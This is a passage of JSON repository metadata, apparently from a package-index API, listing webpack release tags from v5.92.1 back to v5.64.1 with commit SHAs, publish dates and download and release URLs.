a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v